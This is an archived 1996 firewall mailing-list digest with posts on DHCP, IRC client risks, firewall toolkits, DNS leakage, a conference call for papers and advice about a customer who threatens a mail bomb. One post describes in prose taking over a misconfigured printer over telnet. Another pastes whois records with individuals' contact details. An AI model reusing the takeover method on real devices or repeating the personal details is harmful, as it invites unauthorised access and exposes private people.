From firewalls-owner Mon Jul 8 08:50:59 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA26226 for firewalls-outgoing; Mon, 8 Jul 1996 08:46:40 -0700 (PDT) Received: from ftp.com (ftp.com [128.127.2.122]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id IAA26215 for ; Mon, 8 Jul 1996 08:46:31 -0700 (PDT) Received: from ftp.com by ftp.com ; Mon, 8 Jul 1996 11:43:46 -0400 Received: from mailserv-100bs.ftp.com by ftp.com ; Mon, 8 Jul 1996 11:43:46 -0400 Received: by MAILSERV-100BS.FTP.COM (SMI-8.6/SMI-SVR4) Date: Mon, 8 Jul 1996 11:42:34 -0400 Message-Id: <199607081542.LAA23080@MAILSERV-100BS.FTP.COM> To: Russ.Cooper@RC.Toronto.on.ca Subject: RE: Help me (DHCP) Dynamic host configuration protocol From: chip@ftp.com (Chip Sparling) Reply-To: chip@ftp.com Cc: "Firewalls@greatcircle.com" Repository: mailserv-100bs.ftp.com, [message accepted at Mon Jul 8 11:42:25 1996] Originating-Client: slingshot.ftp.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

>Although I'm not sure what you mean by security level, DHCP is normally
>contained to your own segment, so unless your Internet router is forwarding
>DHCP broadcasts (or all broadcasts) to the Internet the security risks are
>within your site.

Not a firewall thing, but a specific DHCP security problem. I exploited a broken Apple DHCP client to completely take over a printer that is now my plaything :-) It is an Apple LaserWriter (LW) 16/600 PS and it took the IP address that I was assigning to another machine with our (FTP Software) DHCP server on Windows 95. It seems that if you don't configure IP on the LW, it polls forever with DHCP and then will take any BOOTP/DHCP response, even if directed at a hardware address other than its own.
In this case it grabbed an IP address that I was giving to someone else, then both clients started generating "Duplicate IP address detected" messages. I was tracing all DHCP traffic and thus had the wayward printer's hardware address. Using the new IP address it grabbed, I telnetted to it, logged in (the telnet server had no default password; the first login sets it), printed the configuration page (printed to paper, not screen), picked and set a random but valid IP address and restarted the machine. Then I set about finding the owner of the printer: the telnet login had identified the machine as an Apple, so I set off to find our graphic designers, who happened to be huddled around one of their printers that had magically started printing setup screens and rebooting itself.

The final solution was either to have a broken DHCP client forever polling and accepting any responses, or a static IP address, so we now have a machine in our DNS called bad-dhcp-client.ftp.com or some such. The users only print to it with AppleTalk, but there is no way to completely turn off the IP protocol (as far as I can tell).
chip

From firewalls-owner Mon Jul 8 09:49:36 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA00606 for firewalls-outgoing; Mon, 8 Jul 1996 09:43:05 -0700 (PDT) Received: from sapa.inka.de (sapa.inka.de [193.197.84.6]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id JAA00584 for ; Mon, 8 Jul 1996 09:42:54 -0700 (PDT) Received: from uu.inka.de (root@[193.197.84.8]) by sapa.inka.de Received: from lina (ecki@lina.inka.de) by uu.inka.de Received: by lina Message-Id: From: ecki@lina.inka.de (Bernd Eckenfels) Subject: Re: IRC and Firewalls To: gordy@nytimes.com (Gordy Thompson) Date: Mon, 8 Jul 1996 17:58:50 +0200 (MET DST) Cc: firewalls@GreatCircle.COM In-Reply-To: from "Gordy Thompson" at Jul 8, 96 02:18:50 am X-Mailer: ELM [version 2.4 PL25 PGP2] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Hi,

> Assume that the protocol itself can be securely relayed through
> the firewall (via UDP Relay, perhaps, or a custom-built relay)

It's TCP to ports like 6660-6670.

> and leave
> aside "social engineering" threats like sweet-talking a user into
> executing a bunch of commands. Are the interior hosts running IRC clients
> (or even those that aren't) still exposed to risks?

Yes, there were a few problems in IRC clients like buffer overruns. Another problem was DCC get: people can send you a bunch of files, including a new .rhosts. A much bigger problem is the addiction potential :)

> I know a lot depends on the particular implementation of
> application software, but we're just beginning to explore this issue and
> I'm looking for anything I can find out. Are there particular
> implementations of IRC client s/w that are thought to be especially
> dangerous to use? Are there any that _aren't?_

I have seen a proxy IRC client which can hide local host and usernames. I will look for the source.
It understands the protocol, acts as server to internal clients and acts as client to servers. Greetings Bernd From firewalls-owner Mon Jul 8 10:49:18 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA04196 for firewalls-outgoing; Mon, 8 Jul 1996 10:37:29 -0700 (PDT) Received: from snmpmgr.state.tn.us (snmpmgr.state.tn.us [170.142.1.74]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id KAA04167 for ; Mon, 8 Jul 1996 10:37:17 -0700 (PDT) Received: from langate.tnet.state.tn.us ([170.142.11.126]) by snmpmgr.state.tn.us with SMTP id AA11050 Received: from tn01-Message_Server by langate.tnet.state.tn.us Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Mon, 08 Jul 1996 12:33:21 -0500 From: "Samuel T. Baker" To: firewalls@GreatCircle.COM Subject: Firewall configuration validation Mime-Version: 1.0 Content-Type: text/plain Content-Disposition: inline Sender: firewalls-owner@GreatCircle.COM Precedence: bulk What tools or practices are appropriate/useful for validating the conformance of a firewall configuration to the stated security policy? Samuel T. 
Baker Director, Computer Operations 615 532-8026 voice 615 734-6459 fax sbaker@mail.state.tn.us Happy Birthday, Tennessee Celebration of the Centuries, 1796-1996 From firewalls-owner Mon Jul 8 11:04:18 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA04272 for firewalls-outgoing; Mon, 8 Jul 1996 10:38:28 -0700 (PDT) Received: from toadflax.cs.ucdavis.edu (toadflax.cs.ucdavis.edu [128.120.56.188]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id KAA04247 for ; Mon, 8 Jul 1996 10:38:15 -0700 (PDT) Received: from nob (nob.cs.ucdavis.edu) by toadflax.cs.ucdavis.edu (4.1/UCD.CS.2.6) Received: by nob (5.x/UCDCS.SECLAB.Solaris2-2.0) Date: Mon, 8 Jul 1996 10:35:23 -0700 From: bishop@cs.ucdavis.edu (Matt Bishop) Message-Id: <9607081735.AA28855@nob> To: firewalls@greatcircle.com Subject: [2nd Posting] CFP: Symposium on Network and Distributed System Security Sender: firewalls-owner@GreatCircle.COM Precedence: bulk CALL FOR PAPERS The Internet Society Symposium on Network and Distributed System Security February 10-11, 1997, San Diego Princess Resort, San Diego, California Submissions due: August 1, 1996 Notification to Authors: October 1, 1996 Camera-Ready Copy due: November 1, 1996 GOAL: The symposium will bring together people who are building hardware and software to provide network and distributed system security services. The symposium is intended for those interested in the practical aspects of network and distributed system security, focusing on actual system design and implementation, rather than theory. We hope to foster the exchange of technical information that will encourage and enable the Internet community to apply, deploy, and advance the state of available security technology. Symposium proceedings will be published by the IEEE Computer Society Press. 
Topics for the symposium include, but are not limited to, the following:

* Design and implementation of communication security services: authentication, integrity, confidentiality, authorization, non-repudiation, and availability.
* Design and implementation of security mechanisms, services, and APIs to support communication security services, key management and certification infrastructures, audit, and intrusion detection.
* Requirements and designs for securing network information resources and tools -- WorldWide Web (WWW), Gopher, archie, and WAIS.
* Requirements and designs for systems supporting electronic commerce -- payment services, fee-for-access, EDI, notary -- endorsement, licensing, bonding, and other forms of assurance.
* Design and implementation of measures for controlling network communication -- firewalls, packet filters, application gateways, and user/host authentication schemes.
* Requirements and designs for telecommunications security especially for emerging technologies -- very large systems like the Internet, high-speed systems like the gigabit testbeds, wireless systems, and personal communication systems.
* Special issues and problems in security architecture, such as interplay between security goals and other goals -- efficiency, reliability, interoperability, resource sharing, and cost.
* Integration of security services with system and application security facilities, and application protocols -- including but not limited to message handling, file transport, remote file access, directories, time synchronization, data base management, routing, voice and video multicast, network management, boot services, and mobile computing.
GENERAL CHAIR:
  David Balenson, Trusted Information Systems

PROGRAM CHAIRS:
  Clifford Neuman, University of Southern California
  Matt Bishop, University of California at Davis

PROGRAM COMMITTEE:
  Steve Bellovin, AT&T Research
  Tom Berson, Anagram Laboratories
  Doug Engert, Argonne National Laboratory
  Warwick Ford, Bell Northern Research
  Richard Graveman, Bellcore
  Li Gong, SRI
  Burt Kaliski, RSA Laboratories
  Steve Kent, BBN
  Tom Longstaff, CERT
  Doug Maughan, National Security Agency
  Dan Nessett, Sun Microsystems
  Hilarie Orman, DARPA
  Michael Roe, Cambridge University
  Christoph Schuba, Purdue University
  Jonathan Trostle, CyberSafe
  Theodore Ts'o, Massachusetts Institute of Technology
  Doug Tygar, Carnegie Mellon University
  Vijay Varadharajan, University of W. Sydney
  Roberto Zamparo, Telia Research

LOCAL ARRANGEMENTS CHAIR:
  Thomas Hutton, San Diego Supercomputer Center

PUBLICATIONS CHAIR:
  Steve Welke, Institute for Defense Analyses

REGISTRATIONS CHAIR:
  Donna Leggett, Internet Society

SUBMISSIONS: The committee invites technical papers and panel proposals for topics of technical and general interest. Technical papers should be 10-20 pages in length. Panel proposals should be two pages and should describe the topic, identify the panel chair, explain the format of the panel, and list three to four potential panelists. Technical papers will appear in the proceedings. A description of each panel will appear in the proceedings, and may at the discretion of the panel chair, include written position statements from each panelist.

Each submission must contain a separate title page with the type of submission (paper or panel), the title or topic, the names of the author(s), organizational affiliation(s), telephone and FAX numbers, postal addresses, Internet electronic mail addresses, and must list a single point of contact if more than one author. The names of authors, affiliations, and other identifying information should appear only on the separate title page.
Submissions must be received by 1 August 1996, and should be made via electronic mail in either PostScript or ASCII format. If the committee is unable to print a PostScript submission, it will be returned and hardcopy requested. Therefore, PostScript submissions should arrive well before 1 August. If electronic submission is difficult, submissions should be sent via postal mail.

All submissions and program related correspondence (only) should be directed to the program chair:

  Clifford Neuman
  University of Southern California
  Information Sciences Institute
  4676 Admiralty Way
  Marina del Rey, California 90292-6695
  Phone: +1 (310) 822-1511
  FAX:   +1 (310) 823-6714
  Email: sndss97-submissions@isi.edu

Dates, final call for papers, advance program, and registration information will be available at the URL: http://www.isoc.org/conferences/ndss97.

Each submission will be acknowledged by e-mail. If acknowledgment is not received within seven days, please contact the program chair as indicated above. Authors and panelists will be notified of acceptance by 1 October 1996. Instructions for preparing camera-ready copy for the proceedings will be sent at that time. The camera-ready copy must be received by 1 November 1996.

From firewalls-owner Mon Jul 8 12:05:57 1996
Date: Mon, 8 Jul 1996 14:00:56 -0500 (CDT)
From: Just Dew it!
To: firewalls@greatcircle.com
Subject: Security Meetings/Symposiums (fwd)

I would like to get information on some of the Security Meetings/Symposiums that are open to the general public, or even those that would require certain credentials. Please respond in kind!

add filter reply 100 flames/32 bitbucket/32 all

From firewalls-owner Mon Jul 8 14:04:19 1996
From: Les Carleton
To: firewalls@greatcircle.com
Newsgroups: comp.security.firewalls
Subject: ROTHERWICK: Whats New?
Date: Mon, 08 Jul 1996 20:19:47 GMT
Organization: The Rotherwick Firewall Resource
Reply-To: les@zeuros.co.uk
Message-ID: <31e16767.2104212@news.demon.co.uk>

Hi folks,

First off I'd like to thank publicly everyone who's contributed to the Rotherwick Firewall Resource with URLs, papers etc etc etc. You've all been great!

It's been a while since we launched the resource to provide a single start point for firewalling information; since then it's grown about five-fold to over 700 pointers, papers and links. I will be removing the "beta phase" notes over the next few days.
If you haven't been by the resource recently, then it's well worth a visit: we now have a large slice of firewall articles referenced and a Product Matrix which maps all the firewalls we have listed against their platforms (or as close as we could get from the information available!) and a What's New? page which you can bookmark to keep up to date.

What we'd like to add to the resource is some form of column(s) about current issues, not in-depth technical stuff, just some chat about issues and events in the firewalling community, but we need a couple of folks who are willing to contribute a small article, say, once a month (ish). Is anyone interested? There is no pay and no reward except getting your name in print on the web. I'd love to pay, but since we're not exactly funded, it'd be a bit difficult :-). If you're interested, let me know at les@zeuros.co.uk.

Anyways ... this is costing bandwidth, so thanks again to all the contributors! Pop by ... you're all welcome!

Cheers!
...Les...

Les Carleton at The Rotherwick Firewall Resource
http://www.zeuros.co.uk/firewall
les@zeuros.co.uk

From firewalls-owner Tue Jul 9 06:04:20 1996
From: snoopy@munich.ixos.de
Message-Id: <9607091158.AA17463@polo.ixos.de>
To: firewalls@greatcircle.com
Subject: Does smap from the TIS Toolkit speak ESMTP ?
Date: Tue, 09 Jul 1996 13:58:04 +0200

Hi there,

we are running a slightly older version of the FWTK and the smap daemon does not seem to do ESMTP.

Is there a version available which speaks ESMTP ?

Thanks a lot...

Love,
Snoopy
--
snoopy@munich.ixos.de

Every passing hour brings the solar system 43,000 miles closer to globular cluster M13 in Hercules and yet there are still some misfits who insist there is no such thing as progress.
- Kurt Vonnegut Jr.

From firewalls-owner Tue Jul 9 07:06:04 1996
Date: Tue, 9 Jul 1996 06:35:39 -0700 (PDT)
From: "Grant M. Fengstad" <419450@valiant.te.CdnAir.CA>
To: snoopy@munic.ixos.de
Cc: firewalls@greatcircle.com
Subject: Re: Does smap from the TIS Toolkit speak ESMTP ?

On Tue, 9 Jul 1996 snoopy@munich.ixos.de wrote:

> Hi there,
>
> we are running a slightly older version of the FWTK and the smap daemon does
> not seem to do ESMTP.
>
> Is there a version available which speaks ESMTP ?

Correct me if I'm wrong, but is not the purpose of SMAP to provide a "bulletproof" front-end to sendmail? If this is the focus, SMAP should be as simple and clean as possible. It would be a mistake to implement lots of functionality and logic in the program.
From firewalls-owner Tue Jul 9 09:22:31 1996
Message-Id: <199607091616.JAA07118@vpm.com>
Date: Tue, 09 Jul 1996 09:11:16 -0700
To: firewalls@GreatCircle.COM
From: Mark Stout
Subject: Setting up an NT firewall

Hi All:

I'm looking for information on how best to install an NT server that will serve the Internet as a web server, but allow internal remote access to the NT server. Can anyone provide me with information or some places to look?
Thanks,
Mark

==========================================================================
Mark Stout     | The Village Potpourri Mall: http://www.vpm.com/
---------------+----------------------------------------------------------
VPM Enterprises; P.O.Box 6427; Folsom, CA 95763-6427
Secured Internet Sales, Marketing and Advertising Specialist
==========================================================================

From firewalls-owner Tue Jul 9 09:34:33 1996
Date: Tue, 9 Jul 1996 09:06:09 -0700
Message-Id: <199607091606.JAA16851@apu.connectix.com>
Subject: Threats and Nasty Emails
From: Rob Sansom

Although this is not really related to firewalls, I was wondering if anyone had a suggestion for a response to a belligerent individual who has been threatening to 'mail bomb' our site, as well as slander our company in the UK. Apparently, this person is very dissatisfied with the performance of the product that they purchased, and the resulting response from tech support. I guess that they got so frustrated that they sent a letter to 'root' at our site, and that's how I got involved. I am wondering if a response to the 'postmaster' or 'root' at their site would be a good idea, or should I just let it be. It's easy to block access from their net, but I would rather not do this.
The net in question is 'intonet.co.uk' and I have tried 'whois' on the domain to no avail (to try to contact the net admin, God forbid this person should be the net admin!), and if anyone has any information on a contact at intonet.co.uk, I would greatly appreciate any information.

Thanks in Advance,

Rob Sansom
Network Admin.
Connectix Corp
(415) 638-7398
sansom@connectix.com

From firewalls-owner Tue Jul 9 09:49:46 1996
Message-Id: <31E28A92.7552@apogee-com.fr>
Date: Tue, 09 Jul 1996 18:36:34 +0200
From: Jean-Francois Zwobada
Organization: APOGEE Communications
To: firewalls@greatcircle.com, sean.scotvold@rnb.com
Subject: split-brain DNS

Hi guys (and hello girls :D )

After being away for a long time, I'd like to thank all of you who answered my questions about split-brain DNS and the 'internal subdomains problem'. I've installed the noforward patch and tested it. This works really great.
Many thanks to Blast who pointed me in the right direction:
ftp://ftp.vix.com/bind/release/4.9.3/contrib/noforward.tar.gz

Cheers,
Jean-Francois
--
______________________ Jean-Francois Zwobada ____________________
Apogee Communications          Tel : +33 (1) 69 85 56 47
Parc Club Universite           Fax : +33 (1) 69 85 56 48
28, rue Jean Rostand
91893 ORSAY Cedex              e-mail : zwobada@apogee-com.fr
__________________________________________________________________

From firewalls-owner Tue Jul 9 10:04:20 1996
From: Shepherd Rudie
To: "'firewalls@greatcircle.com'"
Subject: DNS leakage
Date: Tue, 9 Jul 1996 18:51:42 +0200

Hi,

I run a TIS FWTK Firewall on a Linux 1.2.13 machine. This machine also runs the DNS server for the "outside". On the "inside" there's an NT machine running BIND for internal DNS. The FW is set up to use the inside NS for lookups and the inside NS forwards all queries to the FW DNS server.

Problem is this: The last time my zone was transferred to my ISP, the INTERNAL names suddenly appeared on the internet! Of course this wrecked e-mail and other things as well, but how is this possible? How can the outside DNS provide the secondary with any information regarding the inside? BTW the inside network is not even accessible from the Internet (and thus the secondary DNS).

Any ideas?
Rudie

From firewalls-owner Tue Jul 9 10:22:31 1996
Date: Tue, 9 Jul 1996 09:52:57 -0700 (PDT)
From: Robert Hanson
To: Mark Stout
cc: firewalls@GreatCircle.COM
Subject: Re: Setting up an NT firewall
In-Reply-To: <199607091616.JAA07118@vpm.com>

www.microsoft.com
www.ntworld.com
www.emerald.iea.com

--->
Robert H. Hanson
LAN/WAN Consultant - Internet Service Provider
Otis Orchards, Wa.
Cutting Edge Communications
www.cet.com
(509) 927-9541
finger: info@cet.com or email: roberth@cet.com

On Tue, 9 Jul 1996, Mark Stout wrote:

> Hi All:
>
>
> I'm looking for information on how best to install an NT server that will
> serve the Internet as a web server, but allow internal remote access to the
> NT server. Can anyone provide me with information or some places to look?
>
> Thanks,
> Mark
> ==========================================================================
> Mark Stout     | The Village Potpourri Mall: http://www.vpm.com/
> ---------------+----------------------------------------------------------
> VPM Enterprises; P.O.Box 6427; Folsom, CA 95763-6427
> Secured Internet Sales, Marketing and Advertising Specialist
> ==========================================================================
>

From firewalls-owner Tue Jul 9 10:34:34 1996
Date: Tue, 9 Jul 1996 09:53:23 -0700 (PDT)
From: Robert Hanson
To: Mark Stout
cc: firewalls@GreatCircle.COM
Subject: Re: Setting up an NT firewall
In-Reply-To: <199607091616.JAA07118@vpm.com>

oh... and try emailing daler@iea.com he is "truly" an nt expert...

--->
Robert H. Hanson
LAN/WAN Consultant - Internet Service Provider
Otis Orchards, Wa.
Cutting Edge Communications
www.cet.com
(509) 927-9541
finger: info@cet.com or email: roberth@cet.com

On Tue, 9 Jul 1996, Mark Stout wrote:

> Hi All:
>
>
> I'm looking for information on how best to install an NT server that will
> serve the Internet as a web server, but allow internal remote access to the
> NT server. Can anyone provide me with information or some places to look?
>
> Thanks,
> Mark
> ==========================================================================
> Mark Stout     | The Village Potpourri Mall: http://www.vpm.com/
> ---------------+----------------------------------------------------------
> VPM Enterprises; P.O.Box 6427; Folsom, CA 95763-6427
> Secured Internet Sales, Marketing and Advertising Specialist
> ==========================================================================
>

From firewalls-owner Tue Jul 9 10:49:25 1996
Date: Tue, 9 Jul 96 12:22:45 -0400
Message-Id: <9607091622.AA12030@su1.in.net>
To: Rob Sansom
From: Frank Willoughby
Subject: Re: Threats and Nasty Emails
Cc: firewalls@GreatCircle.com

At 09:06 AM 7/9/96 -0700, Rob Sansom allegedly wrote:
>Although this is not really related to firewalls, I was wondering if
>anyone had a suggestion for a response to a belligerent individual who
>has been threatening to 'mail bomb' our site, as well as slander our
>company in the UK. Apparently, this person is very dissatisfied with the
>performance of the product that they purchased, and the resulting
>response from tech support. I guess that they got so frustrated that
>they sent a letter to 'root' at our site, and that's how I got involved.
>I am wondering if a response to the 'postmaster' or 'root' at their site
>would be a good idea, or should I just let it be. It's easy to block
>access from their net, but I would rather not do this.
>The net in
>question is 'intonet.co.uk' and I have tried 'whois' on the domain to no
>avail (to try to contact the net admin, God forbid this person should be
>the net admin!), and if anyone has any information on a contact at
>intonet.co.uk, I would greatly appreciate any information.

There are two issues here - business & security. In either case, I would not "let it be".

Business
========

How companies react to belligerent customers is a good barometer of their commitment to their customers (without which the company would soon fold). If the customer has a legitimate problem, then escalate it through channels to ensure that it is resolved to the customer's satisfaction. It is *very* important that you make the customer aware that the escalation of the problem is a result of normal business operations (i.e. customer support) and NOT the result of any threats.

If the customer does not have a legitimate complaint, explain to the individual why the complaint is not valid. Try to see the issues from the customer's viewpoint and see if something could be misconstrued to cause the grief he is experiencing.

In any case, it is prudent to help a customer with a problem. Not because they make threats or whine, but because it is a good business practice.

Security
========

Regarding where you stand, here's my 2 cents worth:

Allegedly, the customer made threats to your organization. Proving this in a court of law will be difficult at best. All their lawyer has to do is mumble something about "mail spoofing" and make a feeble attempt to explain what it is and the burden of proof will be on you to prove (to a judge or a lay jury) that the customer did in fact send the mail. Without the cooperation of the local authorities & telecommunications provider, this will not be trivial.
If the customer persists after you have notified the local authorities & solicited the assistance of the telecom provider, then you will have more evidence (but you are still left with trying to explain this to a judge/jury). IMHO, if it got to court, a lot of things just went out of control. This should be defused long before it reaches the courts.

If it was me, I would contact the customer and ask the customer to explain what their problem is and promise to escalate their problem through channels to see that it is resolved one way or another. BTW, please ensure that you carry out your promise - otherwise this will further reflect (negatively) on your organization and the customer may (wrongly so) feel justified in carrying out threats.

After the customer has vented some steam by explaining to you what the problem is, politely point out that while you will escalate their problem through channels, you are not doing so as a result of their threats. I would also explain that while he made the threats in anger and probably didn't really wish to carry them out, your company takes threats seriously and that if the threats persist, you will contact the person's manager as well as the local authorities and turn over the evidence to them and prosecute to the fullest extent of the law. BTW, make sure that you have the support to back up your stated actions (ascertained by a brief discussion of the incident with management) and you have maintained "chain-of-custody" of the evidence to ensure that it has not been tampered with in any way. Also explain that if he desists in the threats and/or attempts to carry them out that you will drop the incident.

You probably already know this, but ensure that you have all of your ducks in a row before the problem gets escalated to management or the authorities.

BTW, mentioning the customer's name on the Internet didn't really do very much to defuse the situation.
Again, in a lawsuit, the burden of proof will be on you to prove that the person did indeed send the threats to you. Also, we don't have a "need-to-know" who the customer is. Who it is - is irrelevant. What they did isn't.

To summarize, speak softly & carry a big stick. Try to help the person as much as you can, but if they persist in the threats, escalate the situation to someone who can better deal with it (managers, authorities, attorneys, etc).

>Thanks in Advance,
>
>Rob Sansom
>Network Admin.
>Connectix Corp
>(415) 638-7398
>sansom@connectix.com

I hope the above was of some help to you.

Best Regards,

Frank

Any sufficiently advanced bug is indistinguishable from a feature.
-- Rich Kulawiec

The opinions expressed above are of the author and may not necessarily be representative of Fortified Networks Inc.

Fortified Networks Inc. - Information Security Consulting
http://www.fortified.com
Phone: (317) 573-0800   FAX: (317) 573-0817
Home of the Free Internet Firewall Evaluation Checklist

From firewalls-owner Tue Jul 9 11:40:49 1996
From: R Ghosh-Roy
Message-Id: <2645.9607091825@bips50.brunel.ac.uk>
Subject: Re: Threats and Nasty Emails
To: frankw@in.net (Frank Willoughby)
Date: Tue, 9 Jul 1996 19:25:45 +0100 (BST)
Cc: sansom@connectix.com, firewalls@GreatCircle.com
In-Reply-To: <9607091622.AA12030@su1.in.net> from "Frank Willoughby" at Jul 9, 96 12:22:45 pm

>
> At 09:06 AM
> 7/9/96 -0700, Rob Sansom allegedly wrote:
>
> >Although this is not really related to firewalls, I was wondering if
> >anyone had a suggestion for a response to a belligerent individual who
> >has been threatening to 'mail bomb' our site, as well as slander our
> >company in the UK. Apparently, this person is very dissatisfied with the
> >performance of the product that they purchased, and the resulting
> >response from tech support. I guess that they got so frustrated that
> >they sent a letter to 'root' at our site, and that's how I got involved.
> >I am wondering if a response to the 'postmaster' or 'root' at their site
> >would be a good idea, or should I just let it be. It's easy to block
> >access from their net, but I would rather not do this. The net in
> >question is 'intonet.co.uk' and I have tried 'whois' on the domain to no
> >avail (to try to contact the net admin, God forbid this person should be
> >the net admin!), and if anyone has any information on a contact at
> >intonet.co.uk, I would greatly appreciate any information.
>
> There are two issues here - business & security. In either case, I
> would not "let it be".
>
> Business
> ========
>
> Security
> ========
>
> To summarize, speak softly & carry a big stick. Try to help the
> person as much as you can, but if they persist in the threats,
> escalate the situation to someone who can better deal with it
> (managers, authorities, attorneys, etc).
>

As far as I can understand, the problem is not at a *personal* level. Therefore, the guy is arguing on behalf of his company which truly feels cheated. If your product didn't meet their requirements, it could be due to a variety of reasons. As Frank suggests, reason it out!

Have a nice day!

Rana

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ R. Ghosh-Roy, Research Fellow @ BIPS                                       +
+ -- R.Ghosh-Roy@brunel.ac.uk -- Extension 2772                              +
+ --.--.--.--.--.--.--.--.--.--.--.--.--.--.--.--.--.--.--.--.--.--.--.--.-- +
+ All opinions stated are my own, and don't even vaguely resemble those of   +
+ Brunel University or Brunel Colleges. ;-)                                  +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

From firewalls-owner Tue Jul 9 11:49:28 1996
From: long-morrow@CS.YALE.EDU
Date: Tue, 9 Jul 1996 14:34:06 -0400 (EDT)
Message-Id: <199607091834.OAA23298@SPARKY.CF.CS.YALE.EDU>
To: firewalls@greatcircle.com, sansom@connectix.com
Subject: Re: Threats and Nasty Emails

Rob Sansom Network Admin. Connectix Corp wrote:

>Although this is not really related to firewalls, I was wondering if
>anyone had a suggestion for a response to a belligerent individual who
>has been threatening to 'mail bomb' our site, as well as slander our
>company in the UK. Apparently, this person is very dissatisfied with the
>performance of the product that they purchased, and the resulting
>response from tech support. I guess that they got so frustrated that
>they sent a letter to 'root' at our site, and that's how I got involved.
>I am wondering if a response to the 'postmaster' or 'root' at their site
>would be a good idea, or should I just let it be. It's easy to block
>access from their net, but I would rather not do this.
>The net in
>question is 'intonet.co.uk' and I have tried 'whois' on the domain to no
>avail (to try to contact the net admin, God forbid this person should be
>the net admin!), and if anyone has any information on a contact at
>intonet.co.uk, I would greatly appreciate any information.

1) Socially, the first response is always to ask the individual calmly and privately to stop. Sounds like that has already been done in this case.

2) Next step is usually to contact the contact person(s) at their site. I did a telnet to info.ripe.net and found some information about Intonet ltd., their net and ISP. British Telecom is apparently their ISP (bt.net):

    Interactive RIPE Whois Database server

    inetnum:      194.73.231.0
    netname:      BT-CUST-3
    descr:        intonet ltd.
    country:      GB
    admin-c:      j bunyer
    tech-c:       simon barnett
    status:       ASSIGNED PA
    changed:      Stewart.Mercer@bt.net 960319
    source:       RIPE

    route:        194.72.0.0/15
    descr:        BTnet
    origin:       AS2856
    mnt-by:       BTNET-MNT
    changed:      peter.willis@bt.net 951018
    source:       RIPE

Here are two contacts at the company (both have the same email address on intonet.co.uk) and their -- exactly the same -- phone number(s):

    person:       j bunyer
    address:      millbourne house
    address:      66-70 coombe road
    address:      new malden
    address:      surrey
    address:      uk
    address:      kt3 4qw
    phone:        +44 1819429214
    fax-no:       +44 1819498033
    e-mail:       bunny@intonet.co.uk
    changed:      Stewart.Mercer@bt.net 960319
    source:       RIPE

    person:       simon barnett
    address:      millbourne house
    address:      66-70 coombe road
    address:      new malden
    address:      surrey
    address:      uk
    address:      kt3 4qw
    phone:        +44 1819429214
    fax-no:       +44 1819498033
    e-mail:       bunny@intonet.co.uk
    changed:      Stewart.Mercer@bt.net 960319
    source:       RIPE

3) If contacting people at Intonet.co.uk doesn't work you might want to contact their ISP. Using the same whois search interface at info.ripe.net I found that the primary administrative contact at BT.NET was Nigel Titley ( Nigel.Titley@bt.net ) and the primary technical contact was Peter Willis ( peter.willis@bt.net ).
Here is the information in RIPE whois format for Nigel Titley:

person:    Nigel Titley
address:   PP201
address:   Network House
address:   Brindley Way
address:   Apsley
address:   Hemel Hempstead
address:   Herts
address:   HP3 9RR
phone:     +44 1442 237674
fax-no:    +44 1442 237728
e-mail:    Nigel.Titley@bt.net
nic-hdl:   NT13
notify:    Nigel.Titley@bt.net
changed:   Nigel.Titley@bt.net 950306
changed:   Nigel.Titley@bt.net 941223
changed:   N.Titley@axion.bt.co.uk 920128
changed:   Nigel.Titley@axion.bt.co.uk 940711
changed:   dfk@cwi.nl 920129
source:    RIPE

Here is the information in RIPE whois format for Peter Willis:

person:    Peter Willis
address:   PP201
address:   Network House
address:   Brindley Way
address:   Apsley
address:   Hemel Hempstead
address:   Herts
address:   HP3 9RR
address:   GB
phone:     +44 1442 237673
fax-no:    +44 1442 237728
e-mail:    peter.willis@bt.net
nic-hdl:   PW19-RIPE
changed:   nigel.titley@bt.net 950306
changed:   peter.willis@bt.net 941118
changed:   hostmaster@ripe.net 950815
source:    RIPE

4) The next step after talking to an ISP and getting no satisfaction would
be to contact your legal staff. Successfully defending yourself against
slander from someone on another continent would appear to be a daunting
(and expensive) proposition. Perhaps someone with a better knowledge of
English law....

5) As to technical solutions -- if you just want to block someone's email
address (they can always change the email address their email comes from
though): We've had real problems with obnoxious individuals abusing our
e-mail->netnews gateway (subscribing the alias feeds for newsgroups to tens
of Internet mailing lists etc. as part of some ongoing flame war in
alt.gothic and alt.college.college-bowl, etc.). We created a spam filter
which lets us block e-mail from being fed into our local mail2news gateway.
It could possibly be adapted to serve as a sendmail->sendmail filter as well
(or you can use it to frontend e-mail to aliases for your incoming email).
The README file is available via URLs:

  ftp://ftp.cs.yale.edu/pub/long/src/network/security/spammerjammer-1.2.README
  http://www.cs.yale.edu/pub/long/src/network/security/spammerjammer-1.2.README

The Gzipped tar file is available via URLs:

  ftp://ftp.cs.yale.edu/pub/long/src/network/security/spammerjammer-1.2.tar.gz
  http://www.cs.yale.edu/pub/long/src/network/security/spammerjammer-1.2.tar.gz

-----
H. Morrow Long, Mgr of Dev., Yale Univ., Comp Sci Dept, 011 AKW,
New Haven, CT 06520-8285, VOICE: (203)-432-{1248,1254} FAX: (203)-432-0593

From firewalls-owner Tue Jul 9 12:42:09 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA11587 for firewalls-outgoing; Tue, 9 Jul 1996 12:21:22 -0700 (PDT)
Received: from us.checkpoint.com (us.checkpoint.com [206.86.35.130]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id MAA11568 for ; Tue, 9 Jul 1996 12:21:14 -0700 (PDT)
Received: from Barbara Jaarsma.us.checkpoint.com ([206.86.35.30]) by us.checkpoint.com (5.x/SMI-SVR4)
Message-Id: <31E2B16D.247A@us.checkpoint.com>
Date: Tue, 09 Jul 1996 12:22:21 -0700
From: Barbara Jaarsma
Organization: CheckPoint Software Technologies, Inc. Technical Services
